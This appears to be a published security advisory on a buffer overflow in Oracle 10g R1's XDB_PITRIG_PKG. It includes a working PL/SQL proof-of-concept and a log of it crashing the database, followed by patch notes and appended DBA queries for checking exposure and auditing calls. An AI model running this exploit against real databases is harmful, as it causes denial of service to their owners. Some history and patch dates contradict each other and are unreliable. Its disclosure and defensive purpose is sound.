Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)
Details

This exploit causes the database to crash

Example

    set serveroutput on
    declare
      buff varchar2(32767);
    begin
      /* generate evil buffer */
      buff:='12345678901234567890123456789';
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||'0012345678901234567890123sh2kerr';
      /* lets see the buffer size */
      dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
      xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
    end;
    /************************************************ POC ****************************/

Exploitation Log:

    Connected to:
    Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production
    With the Partitioning, OLAP and Data Mining options

    SQL>
    SQL> set serveroutput on
    SQL> declare
      2  buff varchar2(32767);
      3  begin
      4  /* generate evil buffer */
      5  buff:='12345678901234567890123456789';
      6  buff:=buff||buff;
      7  buff:=buff||buff;
      8  buff:=buff||buff;
      9  buff:=buff||buff;
     10  buff:=buff||buff;
     11  buff:=buff||'0012345678901234567890123sh2ker';
     12  /* lets see the buffer size */
     13  dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
     14  xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
     15  end;
     16  /
    SEND EVIL BUFFER SIZE:959
    declare
    *
    ERROR at line 1:
    ORA-00604: error occurred at recursive SQL level 1
    ORA-00972: identifier is too long
    ORA-06512: at "XDB.XDB_PITRIG_PKG", line 26
    ORA-06512: at "XDB.XDB_PITRIG_PKG", line 36
    ORA-06512: at line 14

    SQL> set serveroutput on
    SQL> declare
      2  buff varchar2(32767);
      3  begin
      4  /* generate evil buffer */
      5  buff:='12345678901234567890123456789';
      6  buff:=buff||buff;
      7  buff:=buff||buff;
      8  buff:=buff||buff;
      9  buff:=buff||buff;
     10  buff:=buff||buff;
     11  buff:=buff||'0012345678901234567890123sh2kerr';
     12  /* lets see the buffer size */
     13  dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
     14  xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
     15  end;
     16  /
    ERROR:
    ORA-03114: not connected to ORACLE

    declare
    *
    ERROR at line 1:
    ORA-03135: connection lost contact

Patch Information

Apply the latest Oracle Security patches (e.g. CPU Jan 2008)

History

13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

© 2009 by Red-Database-Security GmbH - last update 19-jun-2009
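An exposure check a DBA can run before and after patching, added here as an example and not part of the original advisory: it uses the standard data dictionary views to show the release and XDB component version, whether the package is installed, and who holds EXECUTE on it, then enables object auditing for the package. It assumes a DBA session in SQL*Plus and that the AUDIT_TRAIL parameter is already set so audit records are written.

```sql
-- Added example, not from the advisory. Run as a DBA in SQL*Plus.

-- 1. Release banner; the exploitation log above was captured on 10.1.0.2.0.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle Database%';

-- 2. XML DB component version and status as registered in this database.
SELECT comp_id, version, status
  FROM dba_registry
 WHERE comp_id = 'XDB';

-- 3. Is the package named in the advisory installed?
SELECT owner, object_name, object_type, status, last_ddl_time
  FROM dba_objects
 WHERE owner = 'XDB'
   AND object_name = 'XDB_PITRIG_PKG';

-- 4. Who may execute it? A row with GRANTEE = 'PUBLIC' means every
--    authenticated session can call PITRIG_TRUNCATE.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'XDB'
   AND table_name = 'XDB_PITRIG_PKG'
   AND privilege = 'EXECUTE';

-- 5. Record every call to the package until the CPU is applied
--    (assumption: AUDIT_TRAIL is enabled, otherwise nothing is logged).
AUDIT EXECUTE ON xdb.xdb_pitrig_pkg BY ACCESS;

-- 6. Review recorded calls; direct calls from ordinary accounts
--    are worth investigating.
SELECT username, userhost, timestamp, action_name, returncode
  FROM dba_audit_object
 WHERE owner = 'XDB'
   AND obj_name = 'XDB_PITRIG_PKG'
 ORDER BY timestamp DESC;
```

A session that dies with ORA-03114 or ORA-03135 shortly after an audited call to this package matches the crash shown in the exploitation log.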